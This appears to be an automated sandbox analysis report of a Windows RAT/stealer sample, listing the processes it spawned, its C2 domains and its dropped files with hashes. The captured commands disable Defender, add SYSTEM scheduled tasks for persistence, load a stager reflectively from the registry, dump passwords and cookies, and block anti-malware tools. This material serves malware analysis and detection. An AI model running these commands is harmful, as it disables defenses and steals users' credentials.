PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"

C:\Users\$77main1.exe

"C:\Users\$77main1.exe" 0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Users\$77main1.exe 0"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1751213302-1385746122110234050-934115374-8464557901720287217-1526424837-1330299757"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force

C:\Users\$77Redownloader.exe

"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"

C:\Windows\system32\timeout.exe

timeout 20

C:\Windows\system32\taskeng.exe

taskeng.exe {3BA54D79-45F1-4612-983D-2FA617B33DF7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-12656054402070301516-4255555401522191709-4118009271430661657693471369-971391952"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b640a9e3-a768-4522-b411-f3fd820d4a48}

C:\Windows\system32\taskeng.exe

taskeng.exe {A9057942-B5C4-4631-B462-62F08246B1CD} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f56410db-7eb5-4b3e-a77b-673cdf693e07}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1957198345-102239573611340640-1273495592588059072-68869171511852531341649145162"

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"

C:\Users\Admin\AppData\Local\Temp\hh.exe

C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2007663707-1750485760-95921033511188272091101812646368208037425860902750494678"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagentc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagent.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /im "SecurityHealthSystray.exe" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f

C:\Windows\system32\timeout.exe

timeout 2

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
US 8.8.8.8:53 itroublvehacker.gq udp
US 8.8.8.8:53 api64.ipify.org udp
US 104.237.62.213:443 api64.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 stellacy.ydns.eu udp
SE 193.138.218.173:55562 stellacy.ydns.eu tcp
US 8.8.8.8:53 stellacy.tk udp
IE 3.249.173.109:55562 stellacy.tk tcp
US 8.8.8.8:53 stellacy2.duckdns.org udp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp

Files

\Users\$77main1.exe

MD5 40f541872b9b1f1da056ac6d4bc90ea4
SHA1 6e121d49311a8df04a70b6de6069460f2d55f609
SHA256 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90
SHA512 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e

C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat

MD5 ad9f604467f73ca7ddfef6f71dcf4798
SHA1 544808b2d40f5249b65c6e1e4abcd32f3af1a896
SHA256 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0
SHA512 c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3

memory/2980-18-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/2980-19-0x0000000002000000-0x0000000002008000-memory.dmp

C:\Users\$77Redownloader.exe

MD5 067d274dc271710cb8afd7c0680958fe
SHA1 4282104ec316c3452a81afc623c61ed348331436
SHA256 c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051
SHA512 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

MD5 b7062a62e271b7dd402b7406f8a611ad
SHA1 952cbd23fd41cbc40d17c988de946ec983d262de
SHA256 d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c
SHA512 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

MD5 9d972046c0e663416177f42d19f38e35
SHA1 23aeec718eed2be8adf5380311fc787db03bfc43
SHA256 ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4
SHA512 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808

C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat

MD5 73336bee4fa2b1c3751fa012c9333a79
SHA1 2cc55d9440ed3c17e6b05466c10334b0d3ef0408
SHA256 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2
SHA512 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8

memory/948-42-0x00000000008D0000-0x00000000008D8000-memory.dmp

memory/576-43-0x0000000000810000-0x0000000000B0E000-memory.dmp

memory/948-44-0x000000001AC40000-0x000000001ACDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5 88ab0bb59b0b20816a833ba91c1606d3
SHA1 72c09b7789a4bac8fee41227d101daed8437edeb
SHA256 f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA512 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

memory/1100-54-0x0000000000330000-0x000000000060A000-memory.dmp

memory/1100-55-0x000000001B560000-0x000000001B8A2000-memory.dmp

memory/1100-56-0x0000000000140000-0x0000000000146000-memory.dmp

memory/1100-57-0x0000000002420000-0x00000000024D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

MD5 964c5fffcba7f353cf12d09675a46de6
SHA1 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256 b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512 ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565

memory/1608-101-0x0000000000B10000-0x0000000000B18000-memory.dmp

memory/1608-100-0x0000000019F90000-0x000000001A272000-memory.dmp

memory/1608-102-0x0000000001480000-0x00000000014BE000-memory.dmp

memory/1608-104-0x0000000077490000-0x00000000775AF000-memory.dmp

memory/1608-103-0x00000000775B0000-0x0000000077759000-memory.dmp

memory/1740-108-0x0000000077490000-0x00000000775AF000-memory.dmp

memory/1740-107-0x00000000775B0000-0x0000000077759000-memory.dmp

memory/1740-106-0x0000000140000000-0x0000000140040000-memory.dmp

memory/1740-109-0x0000000140000000-0x0000000140040000-memory.dmp

C:\Windows\Tasks\$77svc64.job

MD5 ebbf450c8f19360b624f7fee691f89f3
SHA1 db96ff8eb3ddc3e9ffd2688e5ab99a64322dc5d2
SHA256 097ad0fe74c7e098469d0d659e568ae1f0d38af0314f46ae2d893168c74e3c46
SHA512 6458685b4d9c7b8daf53d5335d571503b52ef28b491598811f9694837fbc3bb7a8f54b6fdfed8ed405777cc85ca45615a14b71d6bf04ebbe13b79a6876ae15d2

C:\Windows\Tasks\$77svc32.job

MD5 2c4b9982208b13b81def776496577209
SHA1 4ae896fb968ab34c339d1ceebc30609acfebe239
SHA256 3337f7202d27823e7ba94154cc1d87e264770573a9a007931062684f9a1b5c9c
SHA512 dc2d7b058c0731292e110ddcc7e4771216aef2f70175ff58515e660ee6853cfc4c8accd35beccba2b4220d45ca75c9b37dc53849edcca5da390429eb6c4be680

memory/432-152-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/488-162-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/488-160-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

memory/488-158-0x0000000000120000-0x000000000014A000-memory.dmp

memory/432-150-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

memory/432-148-0x0000000000DC0000-0x0000000000DEA000-memory.dmp

memory/480-127-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/480-126-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

memory/480-117-0x00000000000C0000-0x00000000000EA000-memory.dmp

memory/432-113-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

memory/432-111-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

memory/1740-105-0x0000000140000000-0x0000000140040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\config

MD5 1ba367d0f9aac0f650e65ab7401776c0
SHA1 75cf3295125cfaa0c247ebccc57e63f915198683
SHA256 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA512 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

memory/1100-322-0x00000000009E0000-0x00000000009EC000-memory.dmp

memory/1100-321-0x0000000000B70000-0x0000000000BA0000-memory.dmp

memory/1100-337-0x000000001BB00000-0x000000001BBA2000-memory.dmp

memory/1100-336-0x0000000002570000-0x00000000025A2000-memory.dmp

memory/1100-335-0x0000000000BA0000-0x0000000000BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.vbs

MD5 ca906422a558f4bc9e471709f62ec1a9
SHA1 e3da070007fdeae52779964df6f71fcb697ffb06
SHA256 abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 808099bfbd62ec04f0ed44959bbc6160
SHA1 f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256 f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512 e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

MD5 053778713819beab3df309df472787cd
SHA1 99c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256 f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA512 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 eb51755b637423154d1341c6ee505f50
SHA1 d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256 db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512 e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

MD5 a776e68f497c996788b406a3dc5089eb
SHA1 45bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA512 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

memory/2160-485-0x0000000000400000-0x000000000045B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

MD5 0d8360781e488e250587a17fbefa646c
SHA1 29bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256 ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

memory/1816-494-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hh.exe

MD5 4d4c98eca32b14aeb074db34cd0881e4
SHA1 92f213d609bba05d41d6941652a88c44936663a4
SHA256 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

memory/1816-515-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 91128da441ad667b8c54ebeadeca7525
SHA1 24b5c77fb68db64cba27c338e4373a455111a8cc
SHA256 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512 bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

MD5 df991217f1cfadd9acfa56f878da5ee7
SHA1 0b03b34cfb2985a840db279778ca828e69813116
SHA256 deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

MD5 ae8eed5a6b1470aec0e7fece8b0669ef
SHA1 ca0e896f90c38f3a8bc679ea14c808726d8ef730
SHA256 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e
SHA512 e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

C:\Users\Admin\AppData\Local\Temp\bhv3543.tmp

MD5 a98ccb9cf12f4f6c47cd74863792eb49
SHA1 b74ca8f18dec991881793b6e8132224c8e17b1e3
SHA256 43afcd74be45afd69d8c56de052e8d3364fc0ce0aec7d3acc8111b86e9744ffb
SHA512 c1ea9924a90342c0b9eb3c384dfcdcefdbb1c173289a5a860f23cf86e5c25995a993914507b61e914493518ba484368dfa589d30ed69902bb69ca96718a1caba

C:\Users\Admin\AppData\Local\Temp\whysosad

MD5 fc3c88c2080884d6c995d48e172fbc4f
SHA1 cb1dcc479ad2533f390786b0480f66296b847ad3
SHA256 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA512 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll

MD5 ecfb232ae47a07667a5850104ebebe26
SHA1 53db1507d46209797cad3d4029964cdfea708d8e
SHA256 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a
SHA512 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll

MD5 f876b8ce91d572547ea79104f3f24f48
SHA1 a154133be4547d099f4aefb9a5abbd55b02649be
SHA256 c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c
SHA512 f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-07 10:38

Reported

2024-10-07 10:41

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

150s

Command Line

winlogon.exe

Signatures

Modifies Windows Defender notification settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
